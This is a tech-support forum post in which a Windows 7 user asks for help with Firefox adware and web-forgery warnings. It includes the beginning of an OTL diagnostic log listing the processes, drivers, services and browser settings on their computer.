Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

"Firefox redirect / "Reported Web Forgery" [Solved]


  • This topic is locked This topic is locked

#1
snoopdog1951

snoopdog1951

    Member

  • Member
  • PipPip
  • 17 posts

Originally it was a problem with add panels showing up on 3 sides of the page. It was  from an outfit called "Ad by BuyNsave", I uninstalled their program & then removed the extension. It was removed, then the new issue was when I went to amazon or ebay & now anyware a new screen comes on with the "web forgery box" . Thank you for your help on this. I am running Windows 7.

 

OTL logfile created on: 12/28/2014 12:51:26 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\John\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
5.89 Gb Total Physical Memory | 3.90 Gb Available Physical Memory | 66.26% Memory free
11.78 Gb Paging File | 9.40 Gb Available in Paging File | 79.78% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 444.06 Gb Total Space | 370.92 Gb Free Space | 83.53% Space Free | Partition Type: NTFS
Drive Y: | 21.67 Gb Total Space | 11.61 Gb Free Space | 53.57% Space Free | Partition Type: NTFS
 
Computer Name: JOHN-PC | User Name: John | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/12/28 12:51:04 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\John\Desktop\OTL.exe
PRC - [2014/12/10 11:27:32 | 000,337,520 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2014/12/03 00:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/11/24 11:38:56 | 000,224,648 | ---- | M] (Dell Products, LP.) -- C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
PRC - [2014/11/14 20:14:50 | 000,230,792 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler.exe
PRC - [2014/11/04 15:46:30 | 003,435,808 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Smart Defrag 3\SmartDefrag.exe
PRC - [2014/10/13 18:47:22 | 001,802,048 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe
PRC - [2014/09/30 17:00:34 | 000,344,896 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
PRC - [2014/09/16 13:51:54 | 001,631,088 | ---- | M] (Cisco) -- C:\Users\John\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe
PRC - [2014/09/16 13:51:52 | 001,387,880 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\NDSPCShowServer.exe
PRC - [2014/08/22 12:56:00 | 002,281,248 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare 7\ASCTray.exe
PRC - [2014/08/20 12:27:26 | 000,788,256 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare 7\Monitor.exe
PRC - [2014/08/18 16:36:14 | 000,893,216 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare 7\ASCService.exe
PRC - [2013/07/15 12:15:20 | 000,286,056 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
PRC - [2013/07/15 12:15:18 | 000,014,696 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2013/06/21 03:53:16 | 000,081,536 | ---- | M] (Atheros) -- C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
PRC - [2013/06/01 06:31:08 | 000,368,600 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
PRC - [2013/06/01 06:31:06 | 000,169,432 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
PRC - [2013/05/23 08:18:16 | 000,493,656 | ---- | M] (SoftThinks - Dell) -- C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe
PRC - [2013/05/23 08:17:24 | 004,124,760 | ---- | M] (SoftThinks - Dell) -- C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
PRC - [2013/05/23 08:17:06 | 001,915,480 | ---- | M] (SoftThinks SAS) -- C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
PRC - [2009/06/24 16:21:38 | 000,409,744 | ---- | M] (Creative Technology Ltd) -- C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
PRC - [2009/04/07 09:13:10 | 000,673,616 | ---- | M] (SEIKO EPSON CORPORATION) -- C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
PRC - [2006/12/19 18:23:20 | 000,094,208 | ---- | M] (SEIKO EPSON CORPORATION) -- C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/12/10 11:27:27 | 003,758,192 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2014/10/16 02:20:53 | 002,997,248 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\92a3b88ac6300af062edd6503bc5903c\System.IdentityModel.ni.dll
MOD - [2014/10/16 02:20:51 | 000,530,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\7f372539d1837d70e88821cc20ed6530\System.Net.Http.ni.dll
MOD - [2014/10/16 02:20:50 | 019,696,640 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\316b149dbb031d0e35c9d57bb2fc4b6e\System.ServiceModel.ni.dll
MOD - [2014/10/16 02:20:40 | 001,091,072 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\8c9f9e94e93956d68b43e34324790c6d\System.ServiceModel.Web.ni.dll
MOD - [2014/10/16 02:20:36 | 000,399,872 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\7ab3e68c2e523f60bfc4f222cbd1c1d0\System.Xml.Linq.ni.dll
MOD - [2014/10/16 02:10:31 | 018,813,440 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\3646375313dd2b8e3afecbf945960336\PresentationFramework.ni.dll
MOD - [2014/10/16 02:10:20 | 011,025,920 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\006d28e7c86f3e70db90ce06ea2f33fb\PresentationCore.ni.dll
MOD - [2014/10/16 02:10:17 | 001,889,792 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\8b133e0d94535a7534719f70873ca7fe\System.Xaml.ni.dll
MOD - [2014/10/16 02:10:12 | 000,470,528 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\7971f3a1c08c4043cf981f457855b4d4\PresentationFramework.Aero.ni.dll
MOD - [2014/10/16 02:10:10 | 012,894,208 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\db563d596d76daed04e9b5d25b2f4cb9\System.Windows.Forms.ni.dll
MOD - [2014/10/16 02:10:07 | 003,950,080 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\94bbd298ec8575f3c6151a59538a109c\WindowsBase.ni.dll
MOD - [2014/10/16 02:10:05 | 007,668,736 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7147fa233a070283dba824da40089bf1\System.Xml.ni.dll
MOD - [2014/10/16 02:10:05 | 006,990,336 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\691c1ad89d16f49d80e84fa06a79089a\System.Core.ni.dll
MOD - [2014/10/16 02:10:03 | 001,180,672 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\c90a4b709b46b64c89fce02585d55370\System.Management.ni.dll
MOD - [2014/10/16 02:10:01 | 002,822,144 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\f9f13cd8fe1cefaad78579a7c3a41464\System.Runtime.Serialization.ni.dll
MOD - [2014/10/16 02:10:01 | 001,644,544 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\b4c08872c259018b17b2801da33ac80f\System.Drawing.ni.dll
MOD - [2014/10/16 02:10:00 | 000,794,112 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\35d3a1b878542de59cb4fc0593992404\System.ServiceModel.Internals.ni.dll
MOD - [2014/10/16 02:10:00 | 000,122,880 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\046058f81b039ab6fd839e03e67595f8\SMDiagnostics.ni.dll
MOD - [2014/10/16 02:09:58 | 000,976,384 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\0648dbecb7e3fb9523565107e04a5caf\System.Configuration.ni.dll
MOD - [2014/10/16 02:09:57 | 010,100,736 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\17a393b77ae757f0768501fb95ff5af6\System.ni.dll
MOD - [2014/09/16 13:52:32 | 000,091,976 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\z.dll
MOD - [2014/09/16 13:52:28 | 000,339,296 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\ndsLogStore.dll
MOD - [2014/09/16 13:52:26 | 001,403,224 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\libxml2-2.dll
MOD - [2014/09/16 13:52:22 | 000,043,880 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\libgstvideo-0.10.dll
MOD - [2014/09/16 13:52:20 | 000,689,000 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\libgstreamer-0.10.dll
MOD - [2014/09/16 13:52:18 | 000,060,272 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\libgstinterfaces-0.10.dll
MOD - [2014/09/16 13:52:14 | 000,205,672 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\libgstbase-0.10.dll
MOD - [2014/09/16 13:52:10 | 000,044,896 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\libgstapp-0.10.dll
MOD - [2014/09/16 13:52:04 | 008,296,288 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\gsttspplugin.dll
MOD - [2014/09/16 13:51:52 | 011,475,296 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\PCShowServer.dll
MOD - [2014/09/16 13:51:52 | 001,387,880 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\NDSPCShowServer.exe
MOD - [2014/09/16 13:51:48 | 002,948,448 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\DrmSingleton.dll
MOD - [2014/09/16 13:51:48 | 002,106,728 | ---- | M] () -- C:\Users\John\AppData\Local\DIRECTV Player\DiscoveryManager.dll
MOD - [2014/06/04 15:17:12 | 000,892,288 | ---- | M] () -- C:\Program Files (x86)\IObit\Smart Defrag 3\webres.dll
MOD - [2014/03/04 03:03:23 | 016,953,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\ce5f61c5754789df97be8dc991c47d07\mscorlib.ni.dll
MOD - [2013/05/02 16:01:12 | 001,813,792 | ---- | M] () -- C:\Program Files (x86)\Dell Backup and Recovery\OLCoreWrapper.dll
MOD - [2013/01/15 17:48:26 | 000,348,992 | ---- | M] () -- C:\Program Files (x86)\IObit\Advanced SystemCare 7\madexcept_.bpl
MOD - [2013/01/15 17:48:26 | 000,051,008 | ---- | M] () -- C:\Program Files (x86)\IObit\Advanced SystemCare 7\maddisAsm_.bpl
MOD - [2013/01/15 17:48:24 | 000,183,616 | ---- | M] () -- C:\Program Files (x86)\IObit\Advanced SystemCare 7\madbasic_.bpl
MOD - [2013/01/15 17:47:56 | 000,893,248 | ---- | M] () -- C:\Program Files (x86)\IObit\Advanced SystemCare 7\webres.dll
MOD - [2009/03/12 15:45:32 | 000,135,168 | ---- | M] () -- C:\Program Files (x86)\Epson Software\Event Manager\Assistants\Scan Assistant\ScanEngine.dll
MOD - [2008/11/21 13:58:42 | 000,057,344 | ---- | M] () -- C:\Program Files (x86)\Epson Software\Event Manager\Assistants\Scan Assistant\Satwain.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/11/21 20:35:29 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2013/11/24 02:43:55 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2013/07/15 12:15:18 | 000,014,696 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV:64bit: - [2013/06/18 21:18:38 | 000,246,488 | ---- | M] (Realtek Semiconductor) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe -- (RtkAudioService)
SRV:64bit: - [2013/05/11 17:45:54 | 000,822,232 | ---- | M] (Intel® Corporation) [On_Demand | Stopped] -- c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe -- (Intel®
SRV:64bit: - [2013/05/11 17:45:38 | 000,733,696 | ---- | M] (Intel® Corporation) [Auto | Running] -- c:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel®
SRV:64bit: - [2009/11/17 19:14:26 | 000,098,208 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe -- (AERTFilters)
SRV - [2014/12/26 11:02:20 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/12/10 11:27:30 | 000,114,800 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/12/03 00:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/11/24 11:38:56 | 000,224,648 | ---- | M] (Dell Products, LP.) [Auto | Running] -- C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe -- (DellDigitalDelivery)
SRV - [2014/10/15 15:15:07 | 000,179,184 | ---- | M] (Coupons.com Inc.) [Auto | Running] -- C:\Program Files (x86)\Coupons\CouponPrinterService.exe -- (CouponPrinterService)
SRV - [2014/09/30 17:00:34 | 000,344,896 | ---- | M] (IObit) [Auto | Running] -- C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe -- (IMFservice)
SRV - [2014/08/19 15:09:48 | 002,282,272 | ---- | M] (IObit) [Auto | Stopped] -- C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe -- (LiveUpdateSvc)
SRV - [2014/08/18 16:36:14 | 000,893,216 | ---- | M] (IObit) [Auto | Running] -- C:\Program Files (x86)\IObit\Advanced SystemCare 7\ASCService.exe -- (AdvancedSystemCareService7)
SRV - [2014/03/20 16:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2013/09/05 00:01:14 | 000,279,024 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2013/07/02 23:00:14 | 000,312,448 | ---- | M] (Windows ® Win 7 DDK provider) [Auto | Running] -- C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe -- (AtherosSvc)
SRV - [2013/06/21 03:53:16 | 000,081,536 | ---- | M] (Atheros) [Auto | Running] -- C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe -- (ZAtheros Wlan Agent)
SRV - [2013/06/01 06:31:08 | 000,368,600 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2013/06/01 06:31:06 | 000,169,432 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2013/05/23 08:17:06 | 001,915,480 | ---- | M] (SoftThinks SAS) [Auto | Running] -- C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe -- (SftService)
SRV - [2006/12/19 18:23:20 | 000,094,208 | ---- | M] (SEIKO EPSON CORPORATION) [Auto | Running] -- C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe -- (EpsonBidirectionalService)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/12/26 23:52:12 | 000,129,752 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy)
DRV:64bit: - [2014/12/26 10:59:26 | 000,941,784 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2014/12/26 10:59:12 | 000,331,992 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\RtsUVStor.sys -- (RSUSBVSTOR)
DRV:64bit: - [2014/12/26 10:58:58 | 000,118,272 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\TeeDriverx64.sys -- (MEIx64)
DRV:64bit: - [2014/07/17 19:34:21 | 000,594,632 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btfilter.sys -- (BtFilter)
DRV:64bit: - [2014/07/17 19:29:32 | 004,021,248 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2014/06/04 15:17:14 | 000,021,184 | ---- | M] (IObit) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\SmartDefragDriver.sys -- (SmartDefragDriver)
DRV:64bit: - [2014/01/22 12:17:02 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2014/01/22 12:17:01 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2014/01/22 12:17:01 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2013/08/15 16:34:44 | 000,020,464 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iusb3hcs.sys -- (iusb3hcs)
DRV:64bit: - [2013/08/15 16:34:38 | 000,790,000 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3xhc.sys -- (iusb3xhc)
DRV:64bit: - [2013/08/15 16:34:36 | 000,368,624 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3hub.sys -- (iusb3hub)
DRV:64bit: - [2013/08/12 00:54:36 | 000,524,016 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)
DRV:64bit: - [2013/08/12 00:54:36 | 000,034,544 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Smb_driver_Intel.sys -- (SmbDrvI)
DRV:64bit: - [2013/08/12 00:54:34 | 000,030,448 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Smb_driver_AMDASF.sys -- (SmbDrv)
DRV:64bit: - [2013/08/01 02:15:08 | 000,452,088 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2013/07/11 22:32:14 | 000,667,496 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:64bit: - [2013/07/11 22:32:10 | 000,028,008 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorF.sys -- (iaStorF)
DRV:64bit: - [2013/07/09 12:03:44 | 004,445,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2013/07/02 22:34:54 | 000,347,336 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_a2dp.sys -- (BTATH_A2DP)
DRV:64bit: - [2013/07/02 22:34:54 | 000,179,432 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_hcrp.sys -- (BTATH_HCRP)
DRV:64bit: - [2013/07/02 22:34:54 | 000,137,928 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_rcp.sys -- (BTATH_RCP)
DRV:64bit: - [2013/07/02 22:34:54 | 000,116,424 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_avdt.sys -- (btath_avdt)
DRV:64bit: - [2013/07/02 22:34:54 | 000,089,800 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_flt.sys -- (AthBTPort)
DRV:64bit: - [2013/07/02 22:34:54 | 000,077,464 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_lwflt.sys -- (BTATH_LWFLT)
DRV:64bit: - [2013/07/02 22:34:54 | 000,034,384 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_bus.sys -- (BTATH_BUS)
DRV:64bit: - [2013/07/01 13:17:12 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2013/07/01 13:17:04 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2013/07/01 13:17:04 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2012/09/12 15:20:04 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)
DRV:64bit: - [2010/11/20 21:23:47 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2010/11/20 21:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2009/07/13 19:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 19:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 19:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 18:39:20 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WSDPrint.sys -- (WSDPrintDevice)
DRV:64bit: - [2009/06/15 13:06:42 | 000,172,704 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CtClsFlt.sys -- (CtClsFlt)
DRV:64bit: - [2009/06/10 14:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 14:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 14:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 14:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV - [2013/11/19 16:10:36 | 000,034,848 | ---- | M] (IObit.com) [Kernel | On_Demand | Running] -- C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\RegFilter.sys -- (RegFilter)
DRV - [2013/11/19 16:10:36 | 000,023,016 | ---- | M] (IObit.com) [Kernel | On_Demand | Running] -- C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\UrlFilter.sys -- (UrlFilter)
DRV - [2013/03/23 15:48:48 | 000,023,048 | ---- | M] (IObit) [File_System | On_Demand | Running] -- C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\FileMonitor.sys -- (FileMonitor)
DRV - [2009/07/13 19:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {843F8246-B4D3-436E-993C-E683694E7048}
IE:64bit: - HKLM\..\SearchScopes\{843F8246-B4D3-436E-993C-E683694E7048}: "URL" = http://start.mysearc...cr=20185727&ir=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKLM\..\SearchScopes,DefaultScope = {843F8246-B4D3-436E-993C-E683694E7048}
IE - HKLM\..\SearchScopes\{843F8246-B4D3-436E-993C-E683694E7048}: "URL" = http://www.bing.com/...=IE10TR&pc=DCJB
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,First Home Page = http://g.msn.com/1me10IE11ENUS/WOL_WCP
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://windows.microsoft.com/en-US [Binary data over 200 bytes]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?...U218DHP&pc=U218
IE - HKCU\..\SearchScopes,DefaultScope = {BDF61FAE-9D19-40F0-8F34-688DEB334CA9}
IE - HKCU\..\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKCU\..\SearchScopes\{E3480582-FBAB-47BD-B586-87BA7FDCE2BD}: "URL" = http://search.yahoo....p={searchTerms}
IE - HKCU\..\SearchScopes\E2170BFC38574C29915A1E2A25F2714A: "URL" = http://securedsearch...q={searchTerms}
